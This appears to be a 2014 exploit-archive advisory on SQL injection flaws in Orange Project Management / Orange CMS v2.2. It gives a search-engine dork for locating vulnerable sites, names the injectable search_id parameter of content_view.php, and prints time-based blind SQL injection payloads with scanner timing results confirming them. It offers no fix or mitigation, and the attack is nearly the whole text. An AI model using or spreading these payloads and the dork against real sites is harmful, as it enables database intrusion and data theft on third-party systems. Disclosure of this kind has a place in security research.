facebook facebook twitter rss

Orange Project Management v2.2 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Orange Project Management v2.2 Multi Vulnerability
==================================================
Author : indoushka
Vondor : http://www.tecorange.com/
Dork : Powered by Developer Friendly CMS[ Orange CMS ] Version: 2.2
==================================================

SQL injection :

This vulnerability affects /http/content_view.php.
Discovered by: Scripting (Sql_Injection.script).
Attack details
URL encoded GET input search_id was set to 1'"
Error message found:
/http/content_view.php?1&search_id=1(inject her)&sw=search_view

Blind SQL Injection :

This vulnerability affects /http/content_view.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded GET input search_id was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 2.044 s
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.084 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 4.025 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.047 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.047 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.078 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.047 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 4.04 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.062 s

Original value: 17


Like us on Facebook :